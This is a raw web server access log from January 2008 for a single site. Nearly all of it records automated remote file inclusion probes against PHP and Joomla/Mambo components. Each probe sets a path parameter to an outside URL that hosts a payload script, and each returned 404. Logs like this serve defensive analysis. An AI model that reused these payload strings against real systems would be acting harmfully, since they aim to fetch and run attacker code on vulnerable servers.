69.144.55.219 - - [25/Jan/2008:11:06:55 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:06:55 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:06:55 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:06:55 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:07:22 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:07:22 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:07:22 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:08:13 -0800] "GET /errors.php?error=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.84.2 - - [25/Jan/2008:11:08:28 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.53.84.2 - - [25/Jan/2008:11:08:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:10:20 -0800] "GET /logs/access_071229.log/errors.php?error=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:10:21 -0800] "GET /errors.php?error=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:10:21 -0800] "GET /logs/errors.php?error=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [25/Jan/2008:11:10:34 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [25/Jan/2008:11:10:45 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:11:00 -0800] "GET /errors.php?error=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:11:07 -0800] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:11:07 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:11:08 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:11:11:08 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:11:11:08 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:11:11:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:11:54 -0800] "GET /logs/access_071225.log/errors.php?error=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:12:21 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:12:21 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:12:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:12:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:12:29 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:13:12 -0800] "GET /logs/access_071229.log/errors.php?error=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:13:12 -0800] "GET /errors.php?error=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:13:13 -0800] "GET /logs/errors.php?error=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.73 - - [25/Jan/2008:11:14:13 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.74.21 - - [25/Jan/2008:11:15:01 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:15:13 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:15:15 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.189.4.131 - - [25/Jan/2008:11:15:22 -0800] "GET /1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.51.202 - - [25/Jan/2008:11:15:31 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:11:15:34 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:11:15:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:11:15:36 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.58.11.14 - - [25/Jan/2008:11:15:39 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tgd.com.tr/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.58.11.14 - - [25/Jan/2008:11:15:39 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tgd.com.tr/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:16:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:11:16:50 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:11:16:51 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:11:18:08 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:18:23 -0800] "GET /logs/access_071225.log/errors.php?error=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:11:18:25 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:11:18:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:11:18:25 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:20:24 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:20:24 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:20:25 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:20:29 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:20:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:20:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:11:22:01 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.166 - - [25/Jan/2008:11:22:04 -0800] "GET /megumi/?D=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:23:41 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:23:41 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:23:42 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:11:25:16 -0800] "GET /errors.php?error=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [25/Jan/2008:11:25:29 -0800] "GET /logs/access_071224.log/1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [25/Jan/2008:11:25:30 -0800] "GET /logs/1000http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:26:10 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:26:22 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:26:22 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:26:22 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:26:22 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:26:35 -0800] "GET /logs/access_071229.log//vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:26:35 -0800] "GET //vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:26:35 -0800] "GET /logs//vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:27:55 -0800] "GET /errors.php?error=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:27:55 -0800] "GET /errors.php?error=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:28:43 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:28:53 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Jan/2008:11:28:57 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:11:29:17 -0800] "GET //full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.21 - - [25/Jan/2008:11:29:26 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.89.144 - - [25/Jan/2008:11:29:26 -0800] "GET /logs/access_071229.log//vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.89.144 - - [25/Jan/2008:11:29:26 -0800] "GET /logs/access_071229.log//vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:29:26 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:29:26 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.21 - - [25/Jan/2008:11:29:27 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:29:27 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:29:37 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:30:03 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:30:07 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_pathhttp://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:30:34 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:30:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:30:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:11:30:39 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:11:30:57 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:11:30:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:11:31:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:48 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:48 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:50 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:50 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:50 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:55 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:55 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:55 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:55 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:55 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:31:55 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.174.96.200 - - [25/Jan/2008:11:31:58 -0800] "GET /logs/access_071228.log/lang.php?subp=http://studiodom.ovh.org/cd/httpd-mysql? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.174.96.200 - - [25/Jan/2008:11:31:58 -0800] "GET /lang.php?subp=http://studiodom.ovh.org/cd/httpd-mysql? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.174.96.200 - - [25/Jan/2008:11:31:58 -0800] "GET /logs/lang.php?subp=http://studiodom.ovh.org/cd/httpd-mysql? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.103.159.12 - - [25/Jan/2008:11:31:59 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:32:07 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:32:08 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:32:08 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.51.202 - - [25/Jan/2008:11:32:11 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [25/Jan/2008:11:32:12 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.21 - - [25/Jan/2008:11:32:16 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.212 - - [25/Jan/2008:11:32:22 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:32:25 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:32:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
